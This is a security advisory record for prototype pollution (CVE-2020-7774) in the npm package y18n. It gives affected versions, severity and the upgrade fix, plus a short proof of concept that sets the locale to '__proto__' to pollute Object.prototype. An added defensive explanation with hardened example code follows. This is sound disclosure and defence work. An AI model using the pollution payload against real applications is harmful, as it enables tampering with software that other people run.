GHSA-c4w7-xm78-47vh

Source
https://github.com/advisories/GHSA-c4w7-xm78-47vh
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-c4w7-xm78-47vh/GHSA-c4w7-xm78-47vh.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-c4w7-xm78-47vh
Aliases
  • CVE-2020-7774
  • SNYK-JAVA-ORGWEBJARSNPM-1038306
  • SNYK-JS-Y18N-1021887
Published
2021-03-29T16:05:12Z
Modified
2023-11-01T05:44:41.829854Z
Severity
  • 7.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Summary
Prototype Pollution in y18n
Details

Overview

The npm package y18n before versions 3.2.2, 4.0.1, and 5.0.5 is vulnerable to Prototype Pollution.

PoC

const y18n = require('y18n')();

y18n.setLocale('__proto__');
y18n.updateLocale({polluted: true});

console.log(polluted); // true

Recommendation

Upgrade to version 3.2.2, 4.0.1, 5.0.5 or later.
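The PoC above works because a user-controlled locale name is used directly as a property key on an ordinary object, so `__proto__` resolves to `Object.prototype` and the subsequent update writes onto it. The following is an added example, not y18n's own code and not the upstream fix: a minimal locale store with the same `setLocale`/`updateLocale` shape, hardened by (a) refusing the three keys that can reach the prototype chain and (b) storing strings in null-prototype objects so that no key can land on `Object.prototype` even if a check is bypassed. `LocaleStore`, `isPrototypePollutionKey` and `demo` are illustrative names; the sample input is constructed.

```javascript
// Keys that, used as property names on a plain object, reach the prototype chain.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// True when a user-supplied key could pollute Object.prototype.
function isPrototypePollutionKey(key) {
  return FORBIDDEN_KEYS.has(String(key));
}

// Hypothetical hardened locale store (not y18n's implementation).
class LocaleStore {
  constructor() {
    // Object.create(null) has no prototype chain, so even a key that slips
    // through the check cannot be written onto Object.prototype.
    this.cache = Object.create(null);
    this.locale = 'en';
  }

  setLocale(locale) {
    // Fail closed: a locale name is configuration, not a free-form key.
    if (isPrototypePollutionKey(locale)) {
      throw new TypeError(`refusing unsafe locale name: ${locale}`);
    }
    this.locale = locale;
  }

  updateLocale(obj) {
    if (!Object.prototype.hasOwnProperty.call(this.cache, this.locale)) {
      this.cache[this.locale] = Object.create(null);
    }
    const target = this.cache[this.locale];
    // Object.keys only yields own properties; unsafe keys are dropped, not merged.
    for (const key of Object.keys(obj)) {
      if (isPrototypePollutionKey(key)) continue;
      target[key] = obj[key];
    }
  }

  // Look up a string for the current locale, falling back to the key itself.
  __(key) {
    const strings = this.cache[this.locale];
    return strings && key in strings ? strings[key] : key;
  }
}

// Exercises both defences and reports what a plain object sees afterwards.
function demo() {
  const store = new LocaleStore();
  let rejected = false;
  try {
    store.setLocale('__proto__'); // the locale name from the advisory's PoC
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  store.setLocale('fr');
  // Constructed input: JSON.parse creates an *own* "__proto__" property,
  // which is how untrusted translation files would carry such a key.
  const untrusted = JSON.parse('{"hello":"bonjour","__proto__":{"polluted":true}}');
  store.updateLocale(untrusted);
  return {
    rejected,                          // true: '__proto__' locale refused
    pollutedOnPlainObject: {}.polluted, // undefined: Object.prototype untouched
    translated: store.__('hello'),     // 'bonjour': legitimate keys still stored
  };
}
```

The second defence matters on its own: a deny-list of key names is easy to get wrong, whereas a null-prototype cache removes the shared object the pollution has to reach. When reviewing a dependency for this class of bug, look for any place an externally supplied string becomes a property name on `{}`.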

References

Affected packages

npm / y18n

Package

Affected ranges

Type
SEMVER
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
3.2.2

Ecosystem specific

{
    "affected_functions": [
        "(y18n)"
    ]
}

npm / y18n

Package

Affected ranges

Type
SEMVER
Events
Introduced
4.0.0
Fixed
4.0.1

Affected versions

4.*

4.0.0

Ecosystem specific

{
    "affected_functions": [
        "(y18n)"
    ]
}

npm / y18n

Package

Affected ranges

Type
SEMVER
Events
Introduced
5.0.0
Fixed
5.0.5

Ecosystem specific

{
    "affected_functions": [
        "(y18n)"
    ]
}